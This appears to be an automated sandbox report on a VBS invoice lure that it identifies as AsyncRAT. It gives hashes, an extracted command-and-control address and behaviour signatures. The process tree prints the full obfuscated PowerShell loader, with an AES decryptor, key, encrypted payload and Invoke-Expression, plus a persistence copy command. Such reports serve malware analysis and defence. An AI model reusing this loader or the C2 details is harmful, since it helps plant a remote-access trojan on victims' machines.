Overview

overview

10

Static

static

1

INV-23072024.vbs

windows7-x64

8

INV-23072024.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    136s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-07-2024 07:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    INV-23072024.vbs

  • Size

    24KB

  • MD5

    34a34dad70b083609afdec67aa301d25

  • SHA1

    9d732c12eec2e360029fd11cf5fb7ce53e46aeac

  • SHA256

    b7db18ca4db36e201c612c229b392900577840e5d927f741fabf5bef839b03f6

  • SHA512

    0c90b881faae80756ebf443f90b2643e16858b2e285832f7b88d71dea96c6f7b80ef8f7966a6972d2e767ee92be69094e98778730db58de71348b315fd894ea6

  • SSDEEP

    192:qJpGsTSprrrTkrLTUJFrrMT+TGr7fTbJRr14DJzAWA2tDnHJLJIJ0JdJSJ4J6JLc:aIPIwQy8b1MtDnN

Score
10/10
asyncratdefaultdiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

deopjef.duckdns.org:20245

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INV-23072024.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3176
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI20724724405927210805709614137553CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI1Fh22ms+KvpEh1IJ+72lSZDMdqRlp+HepTXQoQcG61YiB+OwKd2JLmXgv0LhnCskRQdm3mKIIoUnPz9JPDeACmxvlGb+mw+fABxwCOhiLARltdO7oCUmv8EdYKbHFu/0V48mjJ0tfVSi5atJ4DN0yU0Rw3vdK6eKKD8tRTqKMhpmduUKF4mNKu6/fqIhjA7PUspiyhn52joH1bgfYvLFloyfih/ae6r1GhZLGNdfn7GX1hHx2ifaImJGSllfmuK1QBe73y89HIVPcDXb5nyKHWqO6GRzd+M4OmHXLthjp99hHl+/+AoyOGcL0NuSVS5vPzJTxkWMayXuszqNtOobBFzoZZITTMrdEWsbw2h1bqVJAsX5Ipx/1ooceJ8WIjs+Kdtu50/s5Ie/NmBrwPj5/TtosZtBovOmWYSMixoqkr1RmyvT7FSAqZRd0I57aUFmafb11W+AFzdsFM9hfxsaDvSMVtbIQMvwy4cOnUnx+OYhz4Kp7gEYfJJ2FcLGkcVYIdS1vCLq9wPucmlLLBuQEf+BIa+L749qxL9ybvVllP8SNVm1KDP2ca9xqsn6fY7ISCY3ttusiNRiuyZNQyO4D0cuM1yYVXw1dfL8xMbbTz9eVl2pctz34e3TFWwQPQnbwf93RPudKR3o/n6mQ8fUvXTGgSaZQJfoDvHGEjoZjrJ6/zpHmrP5P89YvuCciRFQxG4PO7aQFIyvuPLAKSUJzs/l6UNgPdsNTnZoSKxXHIBDULZclKXwfl7rFYpF72KKQuL92c6Lps4NbX5FleyLaOYe9sPwYz5x91JyFNK52UMpwaAIGathvwFNy1DquBzEEtY2MafTKRGCcGjmRkzrGf7xralpypWX6BfhymXTsPVfMxcKWsizbQC5M6AhsyT3lfjH9ezzYmGaS7wAHctiQLxpYMtfaY4npUVn8j+rqDsvUF0zMSPrdiZ8+HUcFb/pISo4qBcOYpsWd1Tz/2GJdRcR1VF2d+VF8rJE+uQ8d8lmxr/zwzoiFO9DiBgnd6TNB56Cy2NtILU1i0t6UczU+4Irba048MbrjeFbR/c5UDi3Q5CYp4uYX5e8NJExmaD126k6Ipk/AgXLjBf2ZaAHsdgYhkaUpizKShT1SxHLWB+mWEdKYncjjlCGqWonMd+yS5I4SNEmQh/DahXhyuGLrN/9H2KsWr/BhQwhkEIKQqwv7xCWOkHVtarw3mBcJMvEI552QEbKCI4zJo0rknLkEmvnIJpq4IoQHkGWXSLUfU/ScqQpC7Zra/KH1eS9LyF/qWWgSJywj5R0MKd5RoE2/4M4ulvkLN/VWEG48cDEPKvOESM/0t9Bh6EwiwGkFiEqJTP71OYXZE23acyTBcW4CgakSofXEnMzvnv0F/OEwLXQpr9LGT/QyC10MwHCpXFsddG9IAUapxS6wEJPii4/kKt1nzsn2DKKu9eNXPIHcaMzIsX87cYZ2BEH1yTBpg0lG+qfbobEKEHzWgg7eD/IMJGXe9EprtT6BI7onzOzLd+wG6TpZRWrj8Bgsiy/5RFtO405jcpO+/830QGe6fEzCHdCIVsqtJHiinRU20bNQm3/apxTfy7Rh62KggiLrSzFFFgSPLFxieGZyggZoTdPlehkk35oSchFh8VAVUJo6eUmgjUr0hVKcsJVvBUKtOe+nIXEUzwkGmORl2v+qUXuhGoVPev4xPOOTcP6pHpOOaWALM6uPoK2OoXmD1ekpfC7ijWhqG/RFQLEtZMQVO6fEX/AGADGYGnLGOPvWGy6abKPVZXB7gxvIlEQeBJJHZqopb7z8LQps/DpzjG22Jivm46aheO/UpcgcLzPExaPTtcjNApdkFlP1nczf5cIsnqjuXLZUdruPA1ZgR7UxAj8ZZRPfD8hgsgR8675ZcMdkzqf4gAyuO6PuPNeFxshX1msCjr+t9H+mD0FRUILjquzcwxTYEqqIBpG3PsvaYWHw17gH8nQu/CZAF+lRm3cGTyNCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:396
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\dinamiteiro.vbs"
        3⤵
          PID:1972
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:1816

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0HGGBLFL\paste1[1].txt
      Filesize

      156B

      MD5

      ad6c37ef980373e9bcbd14810fad34bc

      SHA1

      9c061a1b3608b7c7f1db7cd06c8246913ee11bda

      SHA256

      ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c

      SHA512

      30dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zljli40m.kod.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/396-25-0x00007FFA524C0000-0x00007FFA52F81000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/396-22-0x0000024E567E0000-0x0000024E56802000-memory.dmp

      Filesize

      136KB

      Download

    • memory/396-23-0x00007FFA524C0000-0x00007FFA52F81000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/396-24-0x00007FFA524C0000-0x00007FFA52F81000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/396-12-0x00007FFA524C3000-0x00007FFA524C5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/396-26-0x00007FFA524C3000-0x00007FFA524C5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/396-27-0x00007FFA524C0000-0x00007FFA52F81000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/396-28-0x0000024E79160000-0x0000024E7934C000-memory.dmp

      Filesize

      1.9MB

      Download

    • memory/396-33-0x00007FFA524C0000-0x00007FFA52F81000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1816-30-0x0000000000400000-0x0000000000416000-memory.dmp

      Filesize

      88KB

      Download

    • memory/1816-36-0x00000000061A0000-0x000000000623C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/1816-37-0x00000000067F0000-0x0000000006D94000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/1816-38-0x00000000062B0000-0x0000000006316000-memory.dmp

      Filesize

      408KB

      Download